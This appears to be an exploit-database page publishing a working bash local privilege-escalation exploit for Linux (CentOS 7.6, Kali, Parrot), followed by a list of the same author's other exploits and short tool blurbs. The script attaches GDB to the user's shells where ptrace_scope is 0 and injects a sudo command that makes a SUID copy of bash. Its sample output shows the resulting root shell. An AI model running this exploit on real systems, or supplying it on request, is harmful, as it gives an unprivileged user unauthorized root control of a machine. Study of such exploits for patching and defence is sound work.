Search for hundreds of thousands of exploits

"CentOS 7.6 - 'ptrace_scope' Privilege Escalation"

Author

Exploit author

s4vitar

Platform

Exploit platform

linux

Release date

Exploit published date

2019-06-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/usr/bin/env bash

#######################################################
#                                                     #
#           'ptrace_scope' misconfiguration           #
#              Local Privilege Escalation             #
#                                                     #
#######################################################

# Affected operating systems (TESTED):
# 	Parrot Home/Workstation    4.6 (Latest Version)
#       Parrot Security            4.6 (Latest Version)
#	CentOS / RedHat            7.6 (Latest Version)
#	Kali Linux              2018.4 (Latest Version)

# Authors: Marcelo Vazquez  (s4vitar)
# 	   Victor Lasa       (vowkin)

#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed...         [√]
#[*] System seems vulnerable!                  [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up...                            [√]
#[*] Spawning root shell...                    [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#


function startAttack(){
  tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
    if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
      echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
      echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
    fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
    done

    if [ -f /tmp/bash ]; then
      /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
                       rm /tmp/bash
                       echo -e "                            [√]"
                       echo -ne "[*] Spawning root shell..."
                       echo -e "                    [√]\n"
                       tput cnorm && bash -p'
    else
      echo -e "\n[*] Could not copy SUID to /tmp/bash          [✗]"
    fi
}

echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  echo " [√]"
  echo -ne "[*] Checking if 'GDB' is installed..."
  if command -v gdb >/dev/null 2>&1; then
    echo -e "         [√]"
    echo -e "[*] System seems vulnerable!                  [√]\n"
    echo -e "[*] Starting attack..."

    startAttack

  else
    echo "         [✗]"
    echo "[*] System is NOT vulnerable :(               [✗]"
  fi
else
  echo " [✗]"
  echo "[*] System is NOT vulnerable :(               [✗]"
fi; tput cnorm
Release DateTitleTypePlatformAuthor
2019-10-16"X.Org X Server 1.20.4 - Local Stack Overflow"locallinuxs4vitar
2019-06-14"CentOS 7.6 - 'ptrace_scope' Privilege Escalation"locallinuxs4vitar
2019-06-10"Ubuntu 18.04 - 'lxd' Privilege Escalation"locallinuxs4vitar
2019-03-15"NetData 1.13.0 - HTML Injection"webappsmultiples4vitar
2019-02-28"FTP Server 1.32 - Denial of Service"dosandroids4vitar
2019-02-21"AirDrop 2.0 - Denial of Service (DoS)"dosandroids4vitar
2019-02-21"ScreenStream 3.0.15 - Denial of Service"dosandroids4vitar
2019-02-15"AirMore 1.6.1 - Denial of Service (PoC)"dosandroids4vitar
2019-02-14"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)"dosandroids4vitar
2019-02-11"AirDroid 4.2.1.6 - Denial of Service"dosandroids4vitar
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46989/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.